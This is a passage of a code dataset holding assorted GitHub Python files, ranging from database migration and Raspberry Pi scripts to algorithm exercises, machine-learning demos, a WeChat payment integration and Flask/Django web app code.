points to the new DB\n offset = 0\n while True:\n nb_points = 0\n # Prepare new points\n new_points = []\n # Get points\n res = client.query('SELECT * FROM \"{}\" LIMIT {} OFFSET '\n '{}'.format(measurement, args.step, offset))\n for point in res.get_points():\n new_point = {\"tags\": {},\n \"fields\": {},\n \"time\": None}\n if args.override_measurement:\n new_point[\"measurement\"] = args.override_measurement\n else:\n new_point[\"measurement\"] = measurement\n # Check time\n if point[\"time\"] is None:\n # Point without time\n point_wt_time += 1\n print(\"Can not convert point without time\")\n continue\n # Convert all fields\n for field in fields:\n try:\n new_point[\"fields\"][field] = float(point[field])\n except (ValueError, TypeError):\n if field == \"value\":\n new_key = \"state\"\n else:\n new_key = \"{}_str\".format(field)\n new_point[\"fields\"][new_key] = str(point[field])\n # Add tags\n for tag in tags:\n 
new_point[\"tags\"][tag] = point[tag]\n # Set time\n new_point[\"time\"] = point[\"time\"]\n # Add new point to the new list\n new_points.append(new_point)\n # Count nb points\n nb_points += 1\n\n # Send to the new db\n try:\n new_client.write_points(new_points)\n except Exception as exp:\n raise exp\n\n # If there is no points\n if nb_points == 0:\n # print(\"Measurement {} migrated\".format(measurement))\n break\n else:\n # Increment offset\n offset += args.step\n # Print progress\n print_progress(index + 1, nb_measurements)\n\n # Delete database if needed\n if args.delete:\n print(\"Dropping {}\".format(old_dbname))\n client.drop_database(old_dbname)\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/scripts/influxdb_migrator.py","file_name":"influxdb_migrator.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"4998377106","text":"#!/usr/bin/python2.7\nimport RPi.GPIO as GPIO\nimport time\nimport os\nfrom setproctitle import setproctitle\n\npin = 22\n\ndef bell(pin):\n time.sleep(0.05)\n if not GPIO.input(pin):\n os.system(\"mpg123 bell.mp3\")\n\ndef initialize():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.IN)\n\n GPIO.add_event_detect(22, GPIO.FALLING, callback=bell, bouncetime=300)\n #GPIO.add_event_callback(22, callback=bell, bouncetime=300)\n\nif __name__ == '__main__':\n setproctitle('pi-ringbell')\n initialize()\n\n while True:\n time.sleep(0.05)\n\n","repo_name":"rimek/pi-tools","sub_path":"ringbell/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35846242540","text":"from random import choice\n\n\ndef wrd():\n with open(\"liste.de.mots.francais.sansaccents.txt\", \"r\") as f:\n line = f.readlines()\n word = choice(line).strip()\n return word\n\n\ndef cacher(word):\n cacher = []\n for i in range(1, len(word) + 1):\n cacher.append(\"_ \")\n return cacher\n\n\ndef verification(lettre, lst):\n while lettre in lst:\n print(\"Vous avez déjà entrer cette lettre.\")\n lettre = input(\"choississez une lettre: \")\n if lettre not in lst:\n lst += lettre\n return lettre\n","repo_name":"mathiscapart/Pendu_console","sub_path":"wrd.py","file_name":"wrd.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70049000562","text":"n, m = map(int, input().split())\n\n\ndef dfs(cnt=0, idx=1, res=\"\"):\n global n, m\n if m == cnt:\n print(res)\n return\n for i in range(idx, n+1):\n dfs(cnt+1, i, res+str(i)+' ')\n\n\ndfs()\n","repo_name":"SINHOLEE/Algorithm","sub_path":"python/beckjun/15651_n과m(3).py","file_name":"15651_n과m(3).py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2591200863","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n# Python 3.7\n\n#\n# @Author: *\n# @License: *\n# @Date: *\n# @Version: *\n# @Purpose: linear regresssion with scikit-learn. 
\n# Data used is random.gauss \n#\n\nfrom sklearn import linear_model\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\nrandom.seed(0)\nfig, ax = plt.subplots(figsize=(5, 5))\nplt.grid(True, linestyle='--', linewidth=0.1, alpha=0.7)\n\n#----------------------------------------------------------------------------------------#\n# Step 1: training data\nX = [i for i in range(100)]\nY = [random.gauss(x,10) for x in X]\n\nX = np.asarray(X)[:,np.newaxis]\nY = np.asarray(Y)[:,np.newaxis]\n\nplt.scatter(X,Y)\n\n# #----------------------------------------------------------------------------------------#\n# # Step 2: define and train a model\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X, Y)\n\n# print(model.score(X, Y)) # R²\n# print(model.coef_, model.intercept_) # \n\n# #----------------------------------------------------------------------------------------#\n# # Step 3: prediction\nplt.plot(X, model.predict(X), color='black', linewidth=3, label=\"y = \" + str(round(model.coef_[0][0], 2)) + \"x + \" + str(round(model.intercept_[0], 2)) + \", R²=\" + str(round(model.score(X, Y), 2)))\n\n\nplt.xlabel('x')\nplt.ylabel('y')\nplt.legend(loc=\"best\")\nplt.savefig(\"simple_linear_regression.svg\", bbox_inches='tight')\n# plt.savefig(\"simple_linear_regression.pdf\", bbox_inches='tight')","repo_name":"Jxtopher/experimentations","sub_path":"Random gauss linear regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12802387137","text":"\nimport math\nimport copy\n\n# A class to represent a point in the 2D plane\n\n\nclass Point():\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n# Find the distance between 2 points\n\n\ndef dist(p1, p2):\n    return math.sqrt((p1.x - p2.x) *\n                     (p1.x - p2.x) +\n                     (p1.y - p2.y) *\n                     (p1.y - p2.y))\n\n# Brute-force function that returns\n# the smallest distance between two points\n# in P[] of size n\n\n\ndef bruteForce(P, n):\n    min_val = float('inf')\n    for i in range(n):\n        for j in range(i + 1, n):\n            if dist(P[i], P[j]) < min_val:\n                min_val = dist(P[i], P[j])\n\n    return min_val\n\n# A function to find the distance between the closest points of a strip of a given size.\n# All points in the strip array are sorted by y coordinate.\n# They all have an upper bound\n# on the minimum distance of d\n\n\ndef stripClosest(strip, size, d):\n    min_val = d  # Initialize the minimum distance as d\n    # Iterate over all points and\n    # try the following points while the difference between y coordinates is smaller than d\n    for i in range(size):\n        j = i + 1\n        while j < size and (strip[j].y -\n                            strip[i].y) < min_val:\n            min_val = dist(strip[i], strip[j])\n            j += 1\n\n    return min_val\n\n# Recursive function to find the smallest distance.\n# Array P contains all points sorted by x coordinate\n\n\ndef closestUtil(P, Q, n):\n\n    if n <= 3:\n        return bruteForce(P, n)\n\n    # Find the middle point\n    mid = n // 2\n    midPoint = P[mid]\n\n    Pl = P[:mid]\n    Pr = P[mid:]\n\n    # Consider the vertical line through the middle point,\n    # compute the smallest distance dl on its left and dr on its right\n    dl = closestUtil(Pl, Q, mid)\n    dr = closestUtil(Pr, Q, n - mid)\n\n    # Take the min of dl and dr\n    d = min(dl, dr)\n    # Build an array stripP[] of points close (closer than d) to the line through the middle point\n    stripP = []\n    stripQ = []\n    lr = Pl + Pr\n    for i in range(n):\n        if abs(lr[i].x - midPoint.x) < d:\n            stripP.append(lr[i])\n        if abs(Q[i].x - midPoint.x) < d:\n            
stripQ.append(Q[i])\n\n    stripP.sort(key=lambda point: point.y)  # <-- REQUIRED\n    min_a = min(d, stripClosest(stripP, len(stripP), d))\n    min_b = min(d, stripClosest(stripQ, len(stripQ), d))\n\n    return min(min_a, min_b)\n\n# Main function to find the smallest distance.\n\n\ndef closest(P, n):\n    P.sort(key=lambda point: point.x)\n    Q = copy.deepcopy(P)\n    Q.sort(key=lambda point: point.y)\n\n    return closestUtil(P, Q, n)\n\n\nP = [Point(2, 3), Point(12, 30),\n     Point(40, 50), Point(5, 1),\n     Point(12, 10), Point(3, 4)]\nn = len(P)\nprint(\"Khoảng cách nhỏ nhất là\",\n      closest(P, n))\n","repo_name":"triandn/Applied-Mathematics","sub_path":"OntapCK/Chuong2-HinhHoc/minLengthTwoPoint.py","file_name":"minLengthTwoPoint.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72763129523","text":"import torch\nimport torch.nn as nn\nfrom transformers import BertModel\n\n\nclass BertClassifier(nn.Module):\n    def __init__(self, hidden_dim=512, dropout=0.5):\n        super(BertClassifier, self).__init__()\n        self.bert = BertModel.from_pretrained(\"bert-base-uncased\")\n        self.linear = nn.Linear(768, hidden_dim)\n        self.dropout = nn.Dropout(dropout)\n    \n    def forward(self, data: dict):\n        bert_out = self.bert(**data)[1]\n        return self.dropout(self.linear(bert_out))\n    \n    \n    \nif __name__ == \"__main__\":\n    data = torch.load(\"data/test_txt.pt\")\n    for k in data.keys():\n        data[k] = torch.tensor(data[k])[:5]\n    model = BertClassifier(3)\n    print(model(data).shape)\n    print(model)\n    ","repo_name":"XDxc-cuber/Multi-model","sub_path":"codes/models/BertClassifier.py","file_name":"BertClassifier.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71249110963","text":"import zope\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ERP5Type import Permissions, PropertySheet\nfrom Products.ERP5Type.XMLObject import XMLObject\nfrom zLOG import LOG, WARNING\nimport random, string, hashlib, urllib2, socket\nfrom urlparse import urlparse\ntry:\n    import xml.etree.cElementTree as ET\nexcept ImportError:\n    import xml.etree.ElementTree as ET\n\n\nclass WechatException(Exception):\n    def __init__(self, msg):\n        super(WechatException, self).__init__(msg)\n\nfrom erp5.component.interface.IPaymentService import IPaymentService\n@zope.interface.implementer(IPaymentService)\nclass WechatService(XMLObject):\n    meta_type = 'Wechat Service'\n    portal_type = 'Wechat Service'\n\n    ORDER_URL = \"/pay/unifiedorder\" # Wechat unified order API\n    QUERY_URL = \"/pay/orderquery\"\n\n    # Declarative security\n    security = ClassSecurityInfo()\n    security.declareObjectProtected(Permissions.AccessContentsInformation)\n\n    # Declarative properties\n    property_sheets = ( PropertySheet.Base\n                      , PropertySheet.XMLObject\n                      , PropertySheet.Reference\n                      )\n\n    def generateRandomStr(self, random_length=24):\n        alpha_num = string.ascii_letters + string.digits\n        random_str = ''.join(random.choice(alpha_num) for i in range(random_length))\n        return random_str\n\n\n    def calculateSign(self, dict_content, key):\n        # Calculate the sign according to the data_dict\n        # The rule was defined by Wechat (written in Chinese):\n        # https://pay.weixin.qq.com/wiki/doc/api/native.php?chapter=4_3\n\n        # 1. Sort it by dict order\n        params_list = sorted(dict_content.items(), key=lambda e: e[0], reverse=False)\n        # 2. 
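Concatenate the list to a string of the form 'k1=v1&k2=v2'\n        # Worked example (hypothetical values): for dict_content {'mch_id': '10', 'nonce_str': 'ab'} and key 'K',\n        # the string to sign is 'mch_id=10&nonce_str=ab&key=K' and the sign is its uppercase MD5 hex digest.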
\n        params_str = \"&\".join(u\"{}={}\".format(k, v) for k, v in params_list)\n        # 3. Add the trade key at the end\n        params_str = params_str + '&key=' + key\n\n        md5 = hashlib.md5() # Use MD5 mode\n        md5.update(params_str.encode('utf-8'))\n        sign = md5.hexdigest().upper()\n        return sign\n\n\n    def convert_xml_to_dict(self, xml_content):\n        '''\n        The XML returned by Wechat is like:\n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        '''\n        try:\n            t = ET.XML(xml_content)\n        except ET.ParseError:\n            return {}\n        else:\n            dict_content = dict([(child.tag, child.text) for child in t])\n            return dict_content\n\n\n    def convert_dict_to_xml(self, d):\n        xml = ''\n        for key, value in d.items():\n            if isinstance(value, basestring):\n                xml += '<{0}>'.format(key, value)\n            else:\n                xml += '<{0}>{1}'.format(key, value)\n        xml += ''\n        return xml\n\n\n    def getSandboxKey(self):\n        SANDBOX_KEY_URL = self.getLinkUrlString() + \"/sandboxnew/pay/getsignkey\"\n        params = {}\n        params['mch_id'] = self.getServiceMchId()\n        params['nonce_str'] = self.generateRandomStr()\n        params['sign'] = self.calculateSign(params, self.getServiceApiKey())\n        LOG('WechatService', WARNING,\n            \"getSandboxKey : data = %s SANDBOX_KEY_URL = %s\" % (self.convert_dict_to_xml(params), SANDBOX_KEY_URL), error=False)\n        result = urllib2.Request(SANDBOX_KEY_URL, data=self.convert_dict_to_xml(params))\n        result_data = urllib2.urlopen(result)\n        result_read = result_data.read()\n        result_dict_content = self.convert_xml_to_dict(result_read)\n        return_code = result_dict_content.get('return_code', '')\n        if return_code==\"SUCCESS\":\n            result_msg = result_dict_content['return_msg']\n            if result_msg==\"ok\":\n                sandbox_signkey = result_dict_content['sandbox_signkey']\n                return sandbox_signkey\n            raise Exception(result_dict_content['return_msg'].encode('utf-8'))\n        raise Exception(\"Get sandbox key failed: \" + str(result_dict_content))\n\n    def callWechatApi(self, URL, wechat_dict):\n        portal = self.getPortalObject()\n        wechat_url = self.getLinkUrlString()\n        if self.getWechatMode() == \"SANDBOX\":\n            key = self.getSandboxKey()\n        elif self.getWechatMode() == \"UNITTEST\":\n            return {\"result_code\": 'SUCCESS', \"code_url\": 'weixin://wxpay/bizpayurl?pr=AAAAA'}\n        else:\n            key = self.getServiceApiKey()\n        nonce_str = self.generateRandomStr()\n\n        wechat_spbill_create_ip = self.getWechatSpbillCreateIp()\n        if not wechat_spbill_create_ip:\n            base_url = portal.absolute_url()\n            result = urlparse(base_url)\n            spbill_create_ip = socket.gethostbyname(result.netloc)\n        else:\n            spbill_create_ip = socket.gethostbyname(wechat_spbill_create_ip)\n\n        # Construct parameter for calling the Wechat payment URL\n        wechat_dict['appid'] = self.getServiceAppid()\n        wechat_dict['mch_id'] = self.getServiceMchId()\n        wechat_dict['nonce_str'] = nonce_str\n        if self.getWechatMode() == \"SANDBOX\":\n            # This is for the sandbox test, the sandbox needs total_fee to be exactly 101\n            wechat_dict['total_fee'] = 101 # unit is Fen, 1 CNY = 100 Fen\n            wechat_url += \"/sandboxnew\"\n        wechat_dict['spbill_create_ip'] = spbill_create_ip\n\n        # generate signature\n        wechat_dict['sign'] = self.calculateSign(wechat_dict, key)\n\n        LOG('callWechatApi', WARNING,\n            \"data = %s URL = %s\" % (self.convert_dict_to_xml(wechat_dict), wechat_url + URL), error=False)\n        # send data\n        result = urllib2.Request(wechat_url + URL, data=self.convert_dict_to_xml(wechat_dict))\n        result_data = urllib2.urlopen(result)\n        result_read = result_data.read()\n        result_dict_content = self.convert_xml_to_dict(result_read)\n        return_code = result_dict_content['return_code']
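\n        # Note: 'return_code' reports the communication status; the business outcome is the\n        # separate 'result_code' field, which callers such as getWechatPaymentURL check.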
\n        if return_code==\"SUCCESS\":\n            return result_dict_content\n        else:\n            raise Exception(u\"ERROR could not communicate with Wechat (return_code {}: {})\".format(return_code, result_dict_content.get(\"return_msg\")))\n\n    def getWechatPaymentURL(self, wechat_dict):\n        portal = self.getPortalObject()\n        base_url = portal.absolute_url()\n        notify_url = base_url + \"/ERP5Site_receiveWechatPaymentCallback\" # Wechat payment callback method\n        wechat_dict['notify_url'] = notify_url\n        wechat_dict['trade_type'] = \"NATIVE\"\n        wechat_answer = self.callWechatApi(self.ORDER_URL, wechat_dict)\n        result_code = wechat_answer['result_code']\n        if result_code==\"SUCCESS\":\n            return wechat_answer['code_url']\n        else:\n            raise Exception(u\"ERROR Wechat notified a problem (result_code {}: {})\".format(result_code, wechat_answer.get(\"err_code_des\")))\n\n    def queryWechatOrderStatus(self, wechat_dict):\n        '''\n        documentation(Chinese): https://pay.weixin.qq.com/wiki/doc/api/native.php?chapter=9_2\n        The dict_content should contain at least one of the following:\n        - transaction_id (str): Wechat order number, preferred when available; it is returned in the payment notify callback\n        - out_trade_no(str): The order ID used inside ERP5, less than 32 characters, digits, alphabets, and \"_-|*@\", unique in ERP5\n        '''\n        if \"transaction_id\" not in wechat_dict and \"out_trade_no\" not in wechat_dict:\n            raise WechatException(\"transaction_id or out_trade_no is needed to query the Wechat order\")\n\n        return self.callWechatApi(self.QUERY_URL, wechat_dict)\n\n    def receiveWechatPaymentNotify(self, request, *args, **kwargs):\n        '''\n        Receive the asynchronous callback sent by Wechat after the user pays the order.\n        Wechat will give us something like:\n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        \n        1\n        \n        \n        \n        '''\n\n        wechat_account_configuration = self.ERP5Site_getWechatPaymentConfiguration()\n        params = self.convert_xml_to_dict(request.body)\n\n        if params.get(\"return_code\") == \"SUCCESS\":\n            # Connection is ok\n            sign = params.pop('sign')\n            recalculated_sign = self.calculateSign(params, wechat_account_configuration['API_KEY'])\n            if recalculated_sign == sign:\n                if params.get(\"result_code\", None) == \"SUCCESS\": # payment is ok\n                    # order number\n                    # out_trade_no = params.get(\"out_trade_no\")\n                    # Wechat payment order ID\n                    # This is what we should use when we search the order in the wechat\n                    # transaction_id = params.get(\"transaction_id\")\n                    # Save the Wechat payment order ID somewhere.\n                    # We received the payment...\n                    # Process something\n                    # XXX: display the page confirming the payment was received.\n                    # container.REQUEST.RESPONSE.redirect(\"%s/#wechat_payment_confirmed\")\n                    # We must tell Wechat we received the response. 
Otherwise Wechat will keep sending it within 24 hours\n                    # xml_str = convert_dict_to_xml({\"return_code\": \"SUCCESS\"})\n                    # return container.REQUEST.RESPONSE(xml_str)\n                    return '''\n                        \n                        \n                        \n                        \n                    '''\n                else:\n                    print(u\"{0}:{1}\".format(params.get(\"err_code\"), params.get(\"err_code_des\")))\n            else:\n                # Error information\n                print(params.get(\"return_msg\").encode(\"utf-8\"))\n\n    def initialize(self, REQUEST=None, **kw):\n        \"\"\"See Payment Service Interface Documentation\"\"\"\n        pass\n\n    def navigate(self, wechat_dict, REQUEST=None, **kw):\n        \"\"\"Returns a redirection to the payment page\"\"\"\n        LOG('WechatService', WARNING,\n            'In Navigate', error=False)\n\n        portal = self.getPortalObject()\n        base_url = wechat_dict.pop('base_url', '%s/#wechat_payment' % portal.absolute_url())\n\n        return self.REQUEST.RESPONSE.redirect(\n            \"%s?trade_no=%s&price=%s&payment_url=%s\" % (\n                base_url,\n                wechat_dict['out_trade_no'],\n                wechat_dict['total_fee'],\n                self.getWechatPaymentURL(wechat_dict)\n            )\n        )\n\n    def notifySuccess(self, REQUEST=None, **kw):\n        \"\"\"See Payment Service Interface Documentation\"\"\"\n        raise NotImplementedError\n\n    def notifyFail(self, REQUEST=None, **kw):\n        \"\"\"See Payment Service Interface Documentation\"\"\"\n        raise NotImplementedError\n\n    def notifyCancel(self, REQUEST=None, **kw):\n        \"\"\"See Payment Service Interface Documentation\"\"\"\n        raise NotImplementedError\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_wechat_secure_payment/DocumentTemplateItem/portal_components/document.erp5.WechatService.py","file_name":"document.erp5.WechatService.py","file_ext":"py","file_size_in_byte":11300,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"6746887709","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash \nfrom flask_app.models import user\nmydb = 'recipe_schema'\n\nclass Recipe:\n    def __init__(self, data):\n        self.id = data['id']\n        self.name = data['name']\n        self.under = data['under']\n        self.description = data['description']\n        self.instructions = data['instructions']\n        self.date_cooked = data['date_cooked']\n        self.created_at = data['created_at']\n        self.updated_at = data['updated_at']\n        self.creator = None\n\n    @classmethod\n    def save(cls, data):\n        query = \"INSERT INTO recipes (name, under, description, instructions, date_cooked, created_at, updated_at, user_id) VALUES (%(name)s, %(under)s, %(description)s, %(instructions)s, %(date)s, NOW(), NOW(), %(user_id)s);\"\n        results = connectToMySQL(mydb).query_db(query, data)\n        # print(results)\n        return results\n\n    @classmethod\n    def get_all_recipes_with_creator(cls):\n        query = \"SELECT * FROM recipes JOIN users ON recipes.user_id = users.id;\"\n        results = connectToMySQL(mydb).query_db(query)\n        # print(results)\n        recipes = []\n        for recipe in results:\n            one_recipe = cls(recipe)\n            one_recipe_author_info = {\n                'id' : recipe['users.id'],\n                'first_name' : recipe['first_name'],\n                'last_name' : recipe['last_name'],\n                'email' : recipe['email'],\n                'password' : recipe['password'],\n                'created_at' : recipe['users.created_at'],\n                'updated_at' : recipe['users.updated_at']\n            }\n            author = user.User(one_recipe_author_info)\n            one_recipe.creator = author\n            recipes.append((one_recipe))\n        return recipes\n\n    @classmethod\n    def getByID(cls, data):\n        query = \"SELECT * FROM recipes WHERE id = %(recipe_id)s;\"\n        results = connectToMySQL(mydb).query_db(query, data)\n        print(results)\n        return cls(results[0]) \n\n    @classmethod\n    def getByID_w_user(cls, data):\n        query = 
\"SELECT recipes.*, users.first_name AS username FROM recipes JOIN users ON recipes.user_id = users.id WHERE recipes.id = %(recipe_id)s;\"\n results = connectToMySQL(mydb).query_db(query, data)\n this_post = cls(results[0])\n this_post.creator = results[0]['username']\n return this_post\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE recipes SET name = %(name)s, under = %(under)s, description = %(description)s, instructions = %(instructions)s, date_cooked = %(date_cooked)s, updated_at = CURRENT_TIMESTAMP WHERE id = %(recipe_id)s;\"\n return connectToMySQL(mydb).query_db(query, data)\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM recipes WHERE id = %(recipe_id)s;\"\n return connectToMySQL(mydb).query_db(query, data)\n\n\n @staticmethod\n def validate_recipe(user): \n is_valid = True\n if len(user['name']) < 1: \n flash(\"must enter a name\")\n is_valid = False \n elif len(user['name']) < 2:\n flash('Recipe name must be longer than two characters')\n is_valid = False\n if len(user['description']) < 1:\n flash(\"must enter a description\")\n is_valid = False\n elif len(user['description']) < 2:\n flash('description must be longer than two characters')\n is_valid = False\n if len(user['instructions']) < 1: \n flash(\"must enter instructions\")\n is_valid = False \n elif len(user['instructions']) < 2:\n flash('instructions must be longer than two characters')\n is_valid = False\n if len(user['date']) < 1: \n flash(\"must enter a date\")\n is_valid = False \n return is_valid","repo_name":"svonrickenbach/Coding-Dojo","sub_path":"python/flask_mysql/crud/recipes/flask_app/models/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35612868908","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import connection\nfrom django.db.models import Count\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils import simplejson as json\n\nfrom ui.models import Bike, Station, Ride, Event\n\n\ndef home(request):\n qs_rides = Event.objects.values('bike', 'bike__num')\n qs_rides = qs_rides.annotate(Count('bike'))\n qs_rides = qs_rides.order_by('-bike__count')\n qs_stations = Event.objects.values('station', 'station__desc')\n qs_stations = qs_stations.annotate(Count('station'))\n qs_stations = qs_stations.order_by('-station__count')\n return render(request, 'home.html', {\n 'title': 'home',\n 'rides': qs_rides[:50],\n 'stations': qs_stations[:50],\n })\n\n\ndef _paginate(request, paginator):\n page = request.GET.get('page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return page, items\n\n\ndef bike(request, bike_id):\n bike = get_object_or_404(Bike, id=bike_id)\n count = bike.events.count() / 2\n if count > 0:\n first = bike.events.order_by('date')[0]\n else:\n first = None\n longest = Ride.objects.raw('''\n SELECT *, MAX(date_end - date_start) AS the_max\n FROM ui_ride\n WHERE bike_id=%s\n GROUP BY id\n ORDER BY the_max DESC\n LIMIT 1''', [bike.id])\n paginator = Paginator(bike.events.order_by('-date'), 50)\n page, events = _paginate(request, paginator)\n return render(request, 'bike.html', {\n 'title': 'bike %s' % bike.num,\n 'bike': bike,\n 'events': events,\n 'count': count,\n 'first': first,\n 'longest': longest[0],\n 
})\n\n\ndef station(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n paginator = Paginator(station.events.order_by('-date'), 50)\n page, events = _paginate(request, paginator)\n first = events[0]\n return render(request, 'station.html', {\n 'title': station.desc,\n 'station': station,\n 'events': events,\n 'first': first,\n })\n\n\ndef station_stats(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n count = station.events.count()\n first = station.events.order_by('date')[0]\n return render(request, 'station_stats.html', {\n 'title': station.desc,\n 'station': station,\n 'count': count,\n 'first': first,\n })\n\n\ndef station_monthly_summary_json(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n cursor = connection.cursor()\n cursor.execute('''\n SELECT TO_CHAR(date, 'YYYY-MM') AS yearmonth, COUNT(*) AS ecount,\n is_end\n FROM ui_event\n WHERE station_id=%s\n GROUP BY yearmonth, is_end\n ORDER BY yearmonth, is_end''', [station.id])\n monthly_summary = []\n row = cursor.fetchone()\n d = {}\n while row:\n if row[2]:\n # some rides end slightly into the next quarter, leaving\n # a dangling ends row with no matching row w/starts\n try:\n d['end'] = row[1]\n except:\n d = {'end': row[1], 'month': row[0], 'start': 0}\n d['total'] = d['start'] + d['end']\n # eliminate minimal data\n if d['total'] > 5:\n monthly_summary.append(d)\n d = None\n else:\n d = {'month': row[0], 'start': row[1]}\n row = cursor.fetchone()\n return HttpResponse(json.dumps(monthly_summary),\n content_type='application_json')\n\n\ndef from_to_station(request, station_start_id, station_end_id):\n station_start = get_object_or_404(Station, id=station_start_id)\n station_end = get_object_or_404(Station, id=station_end_id)\n qs_rides = station_start.rides_start.filter(station_end=station_end)\n count = qs_rides.count()\n first = qs_rides.order_by('date_start')[0]\n paginator = Paginator(qs_rides.order_by('-date_start'), 50)\n page, rides = _paginate(request, paginator)\n return render(request, 'from_to_station.html', {\n 'title': 'from %s to %s' % (station_start.desc, station_end.desc),\n 'station_start': station_start,\n 'station_end': station_end,\n 'rides': rides,\n 'count': count,\n 'first': first,\n })\n","repo_name":"dchud/bikestat","sub_path":"bikestat/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29959599800","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(x, y):\n global check\n if not((0 <= x < N) and (0 <= y < M)) or (field[x][y] == \"H\"):\n return 0\n if visited[x][y]:\n check = True\n return -1\n if dp[x][y] != -1:\n return dp[x][y]\n\n visited[x][y] = True\n for i in range(4):\n nx = x + (dx[i] * int(field[x][y]))\n ny = y + (dy[i] * int(field[x][y])) \n dp[x][y] = max(dp[x][y], dfs(nx, ny)+1)\n if check:\n return -1 \n visited[x][y] = False\n\n return dp[x][y] \n\nif __name__ == '__main__':\n N, M = map(int, sys.stdin.readline().split())\n field = [list(sys.stdin.readline().rstrip()) for _ in range(N)]\n\n dx = [0, 0, -1, 1]\n dy = [1, -1, 0, 0]\n\n visited = [[False] * M for _ in range(N)]\n dp = [[-1] * M for _ in range(N)]\n check = False\n\n 
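    # Editor's note (added): the solution above is a memoized DFS -- dp[x][y]
    # caches the longest move count starting from (x, y), while visited[]
    # marks cells on the current recursion path, so reaching a marked cell
    # again means the ball can bounce forever and the answer is -1. Below is
    # a minimal, self-contained sketch of the same pattern on a 1-D track;
    # `_demo_longest_run`, `track`, `memo` and `on_path` are hypothetical
    # names for illustration only, not part of the original solution.
    def _demo_longest_run(track, i, memo, on_path):
        if not (0 <= i < len(track)):   # jumped off the track: the run ends
            return 0
        if on_path[i]:                  # revisited a cell on the current path: cycle
            return float('inf')
        if memo[i] is not None:         # reuse a cached sub-answer
            return memo[i]
        on_path[i] = True
        best = 1 + _demo_longest_run(track, i + track[i], memo, on_path)
        on_path[i] = False
        memo[i] = best
        return best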
print(dfs(0,0))","repo_name":"jey07258/AlgorithmStudy","sub_path":"DP/BJ1103.py","file_name":"BJ1103.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34410479176","text":"import json\nimport os\nimport time\n\nwith open(\"file.json\", encoding='utf-8') as js:\n data = json.load(js)\n\n USDBRL = data['USDBRL']\n EURBRL = data['EURBRL']\n BTCBRL = data['BTCBRL']\n\n\ndef start():\n print(\"----------------------\")\n print(\"REALIZAR SUA CONVERSÃO\")\n print(\"----------------------\")\n a = input(\"...PRESSIONE ENTER....\")\n try:\n if a == \"\":\n print(\"------------------\")\n print(\"OQUE DESEJA FAZER?\")\n res = input(\n \"[1]REALIZAR COTAÇÕES\\n[2]VER INFORMAÇÕES DE MOEDAS\\n[3]SAIR\\n: \")\n if res == '1':\n cotacao()\n elif res == '2':\n info()\n elif res == '3':\n os.system('cls')\n else:\n os.system('cls')\n print(\"PRECISA ESCOLHER UMAS DAS OPÇÕES\")\n else:\n print(\"PRECISA DAR UM ENTER\")\n except:\n os.system('cls')\n print(\"erro\")\n\n\ndef info():\n os.system('cls')\n while True:\n print(\"-----------------------------------\")\n print(\"ESCOLHA UM DAS COTAÇÕES DISPONIVEIS\")\n print(\"[1]USDBRL\\n[2]EURBRL\\n[3]BTCBRL\")\n answer = int(input(\": \"))\n\n try:\n if answer == 1:\n print(f\"Nome: {USDBRL['name']}\\nCotação: {USDBRL['bid']}\\nCode: {USDBRL['code']}\\nCodeIn: {USDBRL['codein']}\")\n time.sleep(1)\n answer_r = input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n elif answer == 2:\n print(f\"Nome: {EURBRL['name']}\\nCotação: {EURBRL['bid']}\\nCode: {EURBRL['code']}\\nCodeIn: {EURBRL['codein']}\")\n time.sleep(1)\n answer_r = 